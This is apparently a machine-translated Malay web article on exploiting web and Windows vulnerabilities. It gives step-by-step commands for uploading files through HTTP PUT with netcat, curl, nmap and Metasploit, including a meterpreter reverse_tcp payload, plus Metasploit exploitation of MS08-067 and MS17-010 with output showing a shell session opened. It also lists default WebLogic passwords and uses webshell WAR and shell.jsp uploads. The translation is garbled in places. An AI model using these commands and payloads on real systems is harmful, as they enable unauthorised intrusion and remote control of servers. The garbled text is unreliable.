Rumah  >  Artikel  >  Operasi dan penyelenggaraan  >  Contoh Analisis Postur Eksploitasi Kerentanan Web

Contoh Analisis Postur Eksploitasi Kerentanan Web

PHPz
PHPzke hadapan
2023-05-27 08:55:271590semak imbas

1. Penggunaan kaedah HTTP PUT

PUT ialah kaedah yang digunakan untuk pengurusan fail Jika kakitangan operasi dan penyelenggaraan belum mengubah suai konfigurasi lalai pelayan web dan masih menyokongnya kaedah, mereka boleh Memuat naik fail ke sistem fail pelayan sesuka hati.

1.1. Netcat menggunakan kaedah PUT

Netcat ialah alat rangkaian yang sangat terkenal, dirujuk sebagai "NC", dan dikenali sebagai "Swiss **" dalam ujian penembusan katakan. Ia boleh melaksanakan pelbagai fungsi seperti pemantauan port, pengimbasan port, pemindahan fail jauh dan shell jauh.

Selepas menyemak bahawa perkhidmatan Web mendayakan kaedah PUT, masukkan arahan berikut untuk memuat naik fail:

nc IP PORT

PUT /dav/hack.txt HTTP/ 1.1

Hos: IP

Contoh Analisis Postur Eksploitasi Kerentanan Web

Tekan Enter dua kali untuk melihat bahawa fail hacked.txt telah berjaya dibuat, kod status ialah 201 dan fail lokasi penciptaan ialah direktori /dav/.

1.2. Nmap menggunakan kaedah PUT

Arahan:

nmap -p port IP -script http-put-script-args http-put . url='/dav/test.php',http-put.file='/root/test.php'

Penjelasan arahan:

-skrip http-put //Pilih http - skrip put, skrip menyokong muat naik fail menggunakan kaedah http put.

-script-args //Tetapkan parameter skrip 1 dan 2

http-put.url='/dav/test.php' //Tetapkan parameter 1 sebagai laluan fail sasaran muat naik

http-put.file='/root/test.php' //Tetapkan parameter 2 untuk memuat naik laluan fail setempat.

Contoh Analisis Postur Eksploitasi Kerentanan Web

Anda boleh lihat dalam gambar bahawa muat naik melalui skrip Nmap berjaya.

1.3 BurpSuite menggunakan kaedah PUT

Gunakan BurpSuite harian untuk mengakses laluan sasaran muat naik untuk menangkap paket data, mengubah suai kaedah permintaan paket data dan laluan muat naik, tulis kandungan fail dalam badan permintaan, dan hantar pakej ke pelayan web.

Contoh Analisis Postur Eksploitasi Kerentanan Web

Pakej respons pelayan menunjukkan bahawa fail telah berjaya dibuat.

Contoh Analisis Postur Eksploitasi Kerentanan Web

1.4 CURL menggunakan kaedah PUT

CURL ialah alat pemindahan fail yang menggunakan sintaks URL untuk berfungsi di bawah baris arahan, memuat naik atau memuat turun melalui yang ditentukan Data URL dan memaparkan data. C dalam curl bermaksud klien, dan URL ialah URL.

Arahan untuk mencipta fail melalui kaedah PUT adalah seperti berikut:

Arahan 1:

curl -i -XPUT -H “Content -Jenis: text/plain ; charset=utf-8” -d “godam selesai” http://192.168.40.4/dav/hack.php

Contoh Analisis Postur Eksploitasi Kerentanan Web

Penjelasan arahan:

-i/--termasuk //Sertakan maklumat pengepala protokol semasa mengeluarkan

-X/--minta //Nyatakan arahan PUT

-H/ --header

-d/--data Kaedah HTTP POST untuk menulis teks Dibuat http://192.168.40.4/dav/hack.php

Perintah 2:

curl -i -X ​​​​PUT - H "Content-Type:application /xml; charset=utf-8″ -d @”F:1.php” http://192.168.40.4/dav/hack.php

Contoh Analisis Postur Eksploitasi Kerentanan Web

Penjelasan arahan:

-d @"filename" //Baca kandungan daripada fail

Contoh Analisis Postur Eksploitasi Kerentanan Web

1.5 QuickPuT skrip menggunakan PUT kaedah

menggunakan QuickPut ialah alat baris arahan Python yang membolehkan kami memuat naik fail ke pelayan menggunakan kaedah HTTP PUT.

Arahan muat naik:

python2 QuickPut.py F:1.php http://192.168.40.4/dav/hack1.php

Contoh Analisis Postur Eksploitasi Kerentanan Web

Penjelasan arahan:

python QuickPut.py

1.6 Metasploit menggunakan kaedah PUT

Modul tambahan/pengimbas Metasploit http/http_put boleh melaksanakan operasi muat naik dan memadam fail.

Arahan:

Gunakan modul http_put untuk perkhidmatan http pengimbasan tambahan

Contoh Analisis Postur Eksploitasi Kerentanan Web

tunjukkan pilihan //Paparkan parameter modul

set RHOSTS 192.168.40.4 //Tetapkan IP sasaran

tetapkan PATH /dav/ //Tetapkan laluan sasaran

tetapkan muatan php/meterpreter/reverse_tcp //Tetapkan muatan serangan

tetapkan nama fail msf.php //Tetapkan nama fail muat naik

Contoh Analisis Postur Eksploitasi Kerentanan Web

tetapkan fail FILEDATA ://root/test.php //Tetapkan laluan data untuk memuat naik fail setempat

eksploit //Mulakan serangan

Contoh Analisis Postur Eksploitasi Kerentanan Web

Hasil pulangan menunjukkan bahawa fail telah berjaya dimuat naik.

2. Eksploitasi kerentanan SMB

Selepas menjalankan pengimbasan port pengumpulan maklumat, didapati bahawa hos mempunyai port 139 dan 445 terbuka dan sepanduk dipaparkan sebagai Microsoft Windows , yang akan dikaitkan dengan 139 dan 445 port SMB Port 445, yang lebih biasa termasuk ms17-010, ms08-067, dsb.

Pengesanan Kerentanan

Arahan:

namp --script=/usr/share/nmap/scripts/smb- vuln-ms08-067.nse –sTIP

namp --script=/usr/share/nmap/scripts/smb-vuln-ms17-010.nse –sTIP

arahan Penjelasan:

--script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse //Gunakan skrip pengimbasan kerentanan Nmapms08-067

-sT //Gunakan pengimbasan TCP

Jika hasil output ialah:

smb-vuln-ms08-067:

VULNERABLE:

Microsoft Windows system vulnerable toremote pelaksanaan kod (MS08-067)

Negeri: VULNERABLE

ID: CVE: CVE-2008-4250

Perkhidmatan Pelayan dalam Microsoft Windows 2000 SP4, XP SP2 dan SP3, Server 2003 SP1 dan SP2, Vista Goldand SP1, Server 2008 dan 7 Pra-Beta membenarkan penyerang jauh untuk melaksanakan kod sewenang-wenangnya melalui permintaan RPC yang dibuat yang mencetuskan limpahan semasa laluan kanonik.

Tarikh pendedahan: 2008-10-23

Rujukan:

https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

https://cve.mitre. org /cgi-bin/cvename.cgi?name=CVE-2008-4250

menunjukkan bahawa kelemahan ms08-067 wujud dan ms17-010 adalah sama seperti di atas.

Eksploitasi Kerentanan

Gunakan modul serangan smb MSF untuk mengeksploitasi kelemahan ms08-067 dan ms17-010.

msf> gunakan exploit/windows/smb/ms08_067_netapi

msfexploit(ms08_067_netapi) > 🎜> [*]Memulakan pengendali TCP terbalik pada port IP pendengaran setempat

Mengesan IP sasaran secara automatik: 445

[*]IP Sasaran: 445- Cap Jari: Windows 2000 - Pek Perkhidmatan 0 - 4 - lang :Bahasa Inggeris

[*] IP Sasaran: 445- Sasaran Terpilih: Windows 2000 Universal

[*] IP Sasaran: 445- Percubaan untuk mencetuskan kelemahan...

[*]Peringkat penghantaran (957487 bait) ke IP sasaran

[*]Sesi meterpreter 2 dibuka (port IP mendengar-> port sasaran melantun)

meterpreter>

Eksploitasi kelemahan MS17-010 adalah sama seperti di atas.

3. Eksploitasi kerentanan Weblogic

Dalam ujian penembusan, kami sering menghadapi pelayan aplikasi Pelayan Weblogic Selepas melihat Pelayan Weblogic, kami berpendapat bahawa Pelayan Weblogic mungkin mempunyai pengurusan latar belakang. Kata laluan yang lemah, kelemahan penyahserialisasian JAVA, kelemahan muat naik fail sewenang-wenangnya dan banyak kelemahan CVE lain dalam versi ini. Mari kongsikan cara mengeksploitasi pelbagai kelemahan dalam Weblogic.

3.1

Backback kata laluan log masuk lemahContoh Analisis Postur Eksploitasi Kerentanan WebLog masuk Pelayan Weblogic Biasa kata laluan lemah: weblogic/weblogic

weblogic/weblogic1

weblogic/weblogic10

weblogic/weblogic123

Jika wujud, anda boleh log masuk ke latar belakang pengurusan pelayan aplikasi dan memuat naik pakej webshellwar .

Sebarkan pakej perang dalam pelayan aplikasi selepas memuat naik

Contoh Analisis Postur Eksploitasi Kerentanan Web

Contoh Analisis Postur Eksploitasi Kerentanan Web

Selepas berjaya memuat naik dan menggunakan pakej perang, anda boleh melawat Malaysia. Contoh Analisis Postur Eksploitasi Kerentanan Web

Contoh Analisis Postur Eksploitasi Kerentanan Web

3.2

JAVA

Kerentanan DeserialisasiCVE kelemahan boleh dikesan terus menggunakan skrip, dan kemudian skrip eksploit boleh ditemui berdasarkan kod kelemahan.
Skrip pengesanan kerentanan weblogik sangat berkuasa dan boleh mengesan pelbagai CVE, laluan latar belakang pengurusan, SSRF, kata laluan yang lemah dan menyokong pengembangan kemudian.

Anda juga boleh menggunakan alat eksploitasi kerentanan penyahserialisasian Java untuk mengesan dan mengeksploitasi secara langsung. Alat kerentanan menyediakan pengesanan kerentanan, pelaksanaan perintah, muat naik fail dan fungsi pemeriksaan kelompok.

Contoh Analisis Postur Eksploitasi Kerentanan Web

3.3 Contoh Analisis Postur Eksploitasi Kerentanan Web

Weblog

Kerentanan Muat Naik Fail Sewenang-wenang

Kembalikan maklumat dengan meledakkan Weblogic.

Contoh Analisis Postur Eksploitasi Kerentanan Web

Dapatkan kata laluan log masuk, nama perkhidmatan dan direktori aksara rawak, dan bina serta muat naik POC untuk memuat naik fail ujian.

Masukkan data berikut dalam laluan /bea_wls_deployment_internal/DeploymentService

Contoh Analisis Postur Eksploitasi Kerentanan Web

Pelayan mengembalikan kejayaan muat naik dan laluan mutlak fail.

Contoh Analisis Postur Eksploitasi Kerentanan Web

Selepas mengakses laluan fail muat naik ini, kandungan fail yang dimuat naik dipaparkan

http://IP/bea_wls_deployment_internal/shell.jsp

Contoh Analisis Postur Eksploitasi Kerentanan Web

Atas ialah kandungan terperinci Contoh Analisis Postur Eksploitasi Kerentanan Web. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Kenyataan:
Artikel ini dikembalikan pada:yisu.com. Jika ada pelanggaran, sila hubungi admin@php.cn Padam